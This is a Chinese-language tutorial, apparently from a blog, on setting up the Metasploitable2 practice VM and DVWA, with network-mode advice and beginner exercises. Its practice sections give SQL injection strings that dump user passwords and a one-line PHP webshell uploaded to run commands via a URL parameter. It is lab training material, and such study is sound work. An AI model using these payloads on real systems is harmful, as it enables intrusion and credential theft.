Metasploitable2安装与基础渗透测试环境搭建指南

张开发
2026/4/7 19:41:31 15 分钟阅读

分享文章

Metasploitable2安装与基础渗透测试环境搭建指南
1. Metasploitable2简介与下载Metasploitable2是网络安全领域最经典的渗透测试靶机之一专门设计用来练习漏洞利用和渗透测试技术。我第一次接触这个靶机是在2015年当时用它练习SQL注入和文件上传漏洞至今仍然觉得它是新手入门的最佳选择。虽然Metasploitable3已经发布但配置过程复杂得多对初学者不太友好。这个靶机预装了多个存在漏洞的服务和应用包括Apache、MySQL、Tomcat等还集成了DVWADamn Vulnerable Web Application这样的漏洞演练平台。最棒的是它开箱即用不需要复杂的配置过程。我建议所有想学习网络安全的朋友都从这个靶机开始。下载Metasploitable2非常简单访问SourceForge项目页面https://sourceforge.net/projects/metasploitable/找到Metasploitable2.zip文件并下载文件大小约1.7GB下载时间取决于你的网速下载完成后你会得到一个zip压缩包。我建议在解压前先创建一个专用文件夹因为解压后会生成多个文件。在Windows上可以使用7-Zip或WinRAR解压Linux和Mac系统自带解压工具就能处理。2. 虚拟机环境配置2.1 导入虚拟机解压后的文件夹中包含.vmdk虚拟磁盘文件和.vmx虚拟机配置文件。我用的是VMware Workstation 16 Pro但VMware Player、VirtualBox等主流虚拟机软件都能兼容。这里分享一个我踩过的坑如果使用VirtualBox建议选择使用现有虚拟硬盘的方式导入而不是直接打开.vmx文件。具体操作步骤打开VMware Workstation点击文件→打开浏览到解压目录选择Metasploitable2.vmx文件导入完成后建议先做个快照命名为初始状态2.2 网络模式选择网络配置是搭建测试环境最关键的环节之一。我强烈建议不要使用桥接模式除非你完全理解风险。曾经有次我在桥接模式下运行Metasploitable2结果不到半小时就被校园网里的其他机器攻击了。三种网络模式的区别NAT模式最安全的选择靶机通过主机上网外部无法直接访问仅主机模式主机和靶机组成独立网络完全隔离桥接模式靶机就像真实设备一样接入局域网对于初学者我的建议是1. 右键虚拟机→设置→网络适配器 2. 选择NAT模式或仅主机模式 3. 点击确定保存设置如果你想同时测试多个虚拟机间的交互比如用Kali Linux攻击Metasploitable2可以使用仅主机模式然后手动配置IP地址在同一网段。3. 系统初始设置3.1 首次启动与登录启动虚拟机后你会看到Linux登录界面。默认凭证是用户名msfadmin密码msfadmin登录成功后建议立即做三件事查看IP地址ifconfig或ip addr show测试网络连接ping 8.8.8.8更新软件包列表sudo apt-get update我遇到过几次网络不通的情况通常是因为虚拟机网络服务没启动。解决方法很简单sudo /etc/init.d/networking restart3.2 基础服务检查Metasploitable2预装了多个漏洞服务我们可以快速检查它们的状态netstat -tulnp这个命令会列出所有正在监听的服务和对应端口。常见的有21/tcpvsftpd 2.3.4存在后门漏洞22/tcpOpenSSH 4.7p1弱口令漏洞80/tcpApache 2.2.8多种Web漏洞如果你想关闭某些服务比如不想被室友扫描到可以使用sudo /etc/init.d/service_name stop4. DVWA漏洞测试平台配置4.1 访问DVWAMetasploitable2内置了DVWA这是我最喜欢的Web漏洞练习平台。访问方法在浏览器中输入靶机IP地址/dvwa使用默认凭证登录admin/password点击Create/Reset Database按钮初始化数据库第一次使用时可能会遇到PHP function allow_url_include: Disabled的警告。这是因为安全配置需要调整sudo nano /etc/php5/apache2/php.ini找到allow_url_include和allow_url_fopen将值改为On然后重启Apachesudo /etc/init.d/apache2 restart4.2 安全等级设置DVWA最实用的功能是可以调整安全等级模拟不同防护强度的环境登录后点击DVWA Security选择安全级别Low/Medium/High/Impossible点击Submit保存设置我建议从Low级别开始练习逐步提高难度。不同级别的主要区别在于Low几乎没有防护直接展示漏洞原理Medium增加了基础过滤High采用了更严格的防护措施Impossible理论上无法攻破的配置5. 基础渗透测试实践5.1 SQL注入实战让我们以DVWA的SQL注入模块为例演示基础测试流程将DVWA安全级别设为Low进入SQL Injection页面在输入框尝试输入1 or 11观察返回结果如果看到返回了所有用户数据说明注入成功。进阶测试可以尝试1 union select 1,concat(user,:,password) from users#这个技巧我在实际渗透测试中经常使用可以快速获取管理员凭证。5.2 文件上传漏洞另一个经典漏洞是文件上传功能绕过进入Upload页面准备一个简单的PHP webshell?php system($_GET[cmd]); ?将文件保存为shell.php.jpg绕过前端验证上传后访问http://靶机IP/dvwa/hackable/uploads/shell.php.jpg?cmdifconfig这种漏洞在老旧CMS系统中仍然很常见。我去年审计的一个企业网站就存在类似问题攻击者可以借此完全控制服务器。6. 安全注意事项虽然Metasploitable2是学习工具但使用时仍需注意永远不要在真实网络环境中直接使用桥接模式测试结束后及时关闭虚拟机不要修改默认密码方便下次使用定期从SourceForge检查更新我习惯在每次使用前恢复快照确保环境干净。另外建议配合Wireshark等工具观察网络流量能更直观理解攻击原理。7. 进阶学习建议掌握了基础操作后可以尝试使用Metasploit框架自动化漏洞利用编写Python脚本批量检测漏洞结合Burp Suite分析HTTP请求尝试提权获取root权限我在教学过程中发现很多学生卡在知道漏洞但不会利用的阶段。解决方法是多动手实践比如每周挑战一个DVWA模块记录测试过程和结果。

更多文章